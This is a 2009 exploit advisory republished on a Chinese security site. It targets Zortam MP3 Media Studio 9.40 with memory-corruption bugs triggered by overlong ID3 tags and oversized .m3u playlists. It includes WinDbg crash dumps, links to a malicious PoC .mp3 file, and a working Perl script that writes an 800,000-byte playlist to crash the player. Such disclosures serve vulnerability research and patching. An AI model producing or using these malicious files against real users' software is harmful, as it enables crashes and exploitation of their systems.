首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Zortam MP3 Media Studio 9.40 Multiple Memory Corruption Vulns
来源:liquidworm gmail com 作者:LiquidWorm 发布时间:2009-07-17  

#!/usr/bin/perl
#
#
# Title: Zortam MP3 Media Studio 9.40 Multiple Memory Corruption Vulnerabilities
#
# Product web page: http://www.zortam.com
#
# Desc: Zortam MP3 Studio version 9.40 suffers from a memory corruption attack from
#       two different malicious files. The first method is thru a .mp3 file which
#       has its ID3 tags filled with long strings. The second method is a .m3u list
#       which is loaded in to the player resulting in memory corruption of the whole
#       application including Dr.Watson crashing along with the app. For 1st method,
#       you can click the Search Media for MP3's button and select the folder where
#       the .mp3 file with the long ID3 tags is located..boom! The 2nd method, load
#       .m3u file into the MP3 Player..boom boom!
#
# Tested on: Microsoft Windows XP Professional SP3 (English)
#
#
# WinDbg:
#
# [*] overly long id3 tags (.mp3 file):
# ---------------------------------------------------------------------------
#
# (edc.f34): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00014d6a ebx=00014d6b ecx=000052c8 edx=00029ad4 esi=03a64ffd edi=03aa3864
# eip=005788fe esp=0012cc9c ebp=00029ad4 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050202
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for [path]\zmmspro.exe -
# zmmspro!ID3_FrameInfo::FieldFlags+0xdce:
# 005788fe f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
#
# ---------------------------------------------------------------------------
#
#
# [*] long playlist (.m3u file):
# ---------------------------------------------------------------------------
#
# (84.b98): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54
# eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00050206
# zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9:
# 005b7ad9 8b01            mov     eax,dword ptr [ecx]  ds:0023:00000000=????????
# 0:000> g
# (84.b98): Access violation - code c0000005 (!!! second chance !!!)
# eax=00000000 ebx=00000111 ecx=00000000 edx=00000000 esi=0012ed5c edi=01e33f54
# eip=005b7ad9 esp=0012ed18 ebp=0012ed2c iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00040206
# zmmspro!ID3_FrameInfo::FieldFlags+0x3ffa9:
# 005b7ad9 8b01            mov     eax,dword ptr [ecx]  ds:0023:00000000=????????
#
# ---------------------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.org
#
# 16.07.2009
#
#

 

 # For first method, use folowing PoC file:   #
 #        #
 ################################################################
 #        #
 # - 1. http://zeroscience.org/codes/aimp2_evil.mp3  #
 #        #
 # - 2. http://milw0rm.com/sploits/2009-aimp2_evil.mp3 (mirror) #
 #        #
 # - 3. http://securityreason.com/download/11/13 (mirror) #
 #        #
 ################################################################
 #        #
 #        #


 # For second method, use folowing PoC code:
 #

 $fle = "Kung_PoW.m3u";
 $mna = "A" x 800000;
 print "\n\n[+] Creating playlist file: $fle ...\r\n";
 sleep 1;
 open(m3u, ">./$fle") || die "\n\aCannot open $fle: $!";
 print m3u "$mna";
 close (m3u);
 print "\n[+] Playlist file successfully created!\r\n";


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Zortam MP3 Player 1.50 (m3u) I
·Hamster Audio Player 0.3a Univ
·ZenPhoto Gallery 1.2.5 Admin P
·MultiMedia Jukebox 4.0 Build 0
·webLeague 2.2.0 (Auth Bypass)
·Easy RM to MP3 Converter 2.7.3
·Microsoft Office Web Component
·MixSense 1.0.0.1 DJ Studio (.m
·Mozilla Firefox 3.5 (Font tags
·Easy RM to MP3 Converter .m3u
·Admin News Tools Remote Conten
·win32/xp sp2 (En) cmd.exe 23 b
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved